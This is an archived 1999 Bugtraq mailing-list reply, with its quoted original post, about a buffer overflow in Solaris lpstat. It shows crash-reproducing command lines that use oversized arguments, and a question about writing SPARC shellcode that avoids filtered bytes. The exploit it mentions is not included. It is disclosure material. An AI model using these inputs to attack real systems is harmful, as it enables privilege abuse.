Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1999_1

Bugtraq archives for 1st quarter (Jan-Mar) 1999: Re: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat

Re: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat

GANG WANG (gang_wgoselecttech.com)
Mon, 8 Feb 1999 19:55:38 -0800

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Patrick Oonk: "Cyrix crash - FreeBSD"
Previous message: BVE: "Re: ISS Internet Scanner Cannot be relied upon for conclusive"
Maybe in reply to: plasmoid deep/thc/clb: "Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat"

Neither does some other charaters like \t ...
It seems lpstat uses sscanf or something like that to
get its parameters.

G.

-----Original Message-----
From: GANG WANG <gang_wgoselecttech.com>
To: plasmoid deep/thc/clb <plasmoidPIMMEL.COM>; BUGTRAQNETSPACE.ORG
<BUGTRAQNETSPACE.ORG>
Date: Monday, February 08, 1999 6:31 PM
Subject: Re: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat


>Things are a little different on Solaris 2.6 Sparc. lpstat only
>accepts a buffer which doesn't contain \x20,\x0a or \x3b.
>Can sb teach me how to write a shellcode on solaris sparc
>without those charaters? I feel that I'm so stupid:-(
>
>G.
>
>-----Original Message-----
>From: plasmoid deep/thc/clb <plasmoidPIMMEL.COM>
>To: BUGTRAQNETSPACE.ORG <BUGTRAQNETSPACE.ORG>
>Date: Wednesday, January 27, 1999 11:16 AM
>Subject: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat
>
>
>>
>>On Aug/25/98 Sun released the following patches for lp:
>>
>> Solaris2.6 Sparc: 106235-02
>> Solaris2.6 x86:   106236
>>
>>It is quite sad, that they did not fix another overflow in
>>/usr/bin/lpstat. I testified this bug on either Solaris 2.7 x86
>>and 2.6 Sparc, I assume that it is also present on Solaris 2.6
>>x86 and 2.7 Sparc.
>>
>>Solaris 2.7 x86
>>% plasmoidgorkie:foo> lpstat -c `perl -e 'print "A" x 998'`
>>% UX:lpstat: ERROR: Class
>>                    [...]
>>%                   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does
>>%                   not exist.
>>%           TO FIX: Use the "lpstat -c all" command to list
>>%                   all known classes.
>>% Segmentation Fault
>>% plasmoidgorkie:foo>
>>
>>Solaris 2.6 Sparc
>>% plasmoidbock:foo> lpstat -c `perl -e 'print "AAAA" x 250'`
>>% UX:lpstat: ERROR: Class
>>                    [...]
>>%                   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does not
>>%                   exist.
>>%          TO FIX: Use the "lpstat -c all" command to list
>>%                  all known classes.
>>% Segmentation Fault
>>% plasmoidbock:foo>
>>
>>This overflow is definitly exploitable, i attached the exploit for
>>Solaris x86. Quality patches for all Solaris versions can be obtained
>>from www.hert.org, a fast security source.
>>
>>plasmoid deep/thc/clb
>>http://thc.inferno.tusculum.edu
>>
>>
>>
>

Next message: Patrick Oonk: "Cyrix crash - FreeBSD"
Previous message: BVE: "Re: ISS Internet Scanner Cannot be relied upon for conclusive"
Maybe in reply to: plasmoid deep/thc/clb: "Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat"